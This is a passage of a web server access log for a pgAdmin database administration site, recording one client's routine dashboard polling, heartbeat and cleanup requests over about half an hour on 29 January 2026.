200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:56:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:56:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:57:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:57:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:57:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:57:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:57:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:57:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:57:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:57:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:57:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:57:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:57:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:58:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:58:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:59:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:59:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:00:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:00:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:01:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:01:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:01:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:02:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:02:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:03:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:03:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:04:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:04:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:05:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:05:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:06:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:06:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:06:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:07:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:07:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:08:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:08:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:09:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:09:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:10:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:10:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:11:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:11:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:11:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:12:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:12:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:13:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:13:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:14:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:14:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:15:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:15:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:16:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:16:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:16:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:17:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:17:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:18:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:18:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:19:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:19:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:20:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:20:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:21:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:21:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:21:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:22:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:22:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:23:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:23:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:24:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:24:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:25:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:25:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to 